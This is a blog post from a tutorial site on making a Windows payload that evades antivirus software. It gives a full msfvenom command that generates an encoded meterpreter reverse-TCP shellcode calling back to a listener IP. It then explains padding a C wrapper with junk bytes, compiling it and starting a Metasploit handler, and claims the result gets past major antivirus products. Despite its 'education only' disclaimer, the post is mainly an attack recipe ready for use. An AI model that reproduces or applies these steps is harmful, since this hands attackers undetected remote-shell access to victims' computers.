Evading Almost Every Anti-Virus

Niteesh Kumar
Jul 22, 2017 · 3 min read

Evading an anti-virus can be really pain in a$$ and while penetration testing you have only one chance to exploit and you don’t want to get caught. There are various evasions methods available out there. One of best one are Veil-Evasion Framework, Hyper Encryption and msf-encoder shikata_ga_nai is not useful enough. By this method you’ll get 96.5% evasion rate.

So I thought to go raw over automated tools, don’t be #scr1ptkidi3. Going raw is not easy but it gives you more freedom to customize.

Here I’ll show you how to generate undetectable payload using msfvenom and c language.

Let’s start by generating raw payload using msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.110 lport=5005 -e x86/shikata_ga_nai -i 5 -b “\x00\xff” -v bleed -f c -o shellcode.txt

Now our payload is generated. Let’s work on writing code for payload. And make sure to write the Payload size i.e., 468 bytes in this case, it will be required later on main C file.

Note: Payload File i.e., C file must be compiled on windows machine.

Below is the sample payload in C language, All we need to do now is add Junk characters, shellcode and payload size.

Let’s generate junk character, here we will use openssl to generate hex value of length 500 chars.

openssl rand -hex 500

Now copy this junk chars to import variable in C file. And also copy shellcode to bleed variable. Followed by entering the size of the payload.

Final Look of Payload (C File)

Now we’re ready to compile, I’ll recommend you to use mingw compiler to compile and You’re ready to go. Fire up the metasploit and start the handler for the same payload, lhost and lport.


Note: Please do not upload it on virustotal. You can download and install trail version of top ranked anti-virus and check. It can evade Kaspersky and Bitdefender as well (Top ranked Anti-virus lol :D). Don’t be evil, this is for education purpose only.

Special thanks to Georgia weidman. I personally recommend please read her book “ Penetration Testing: A Hands-on Introduction to Hacking” It’s really awesome.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade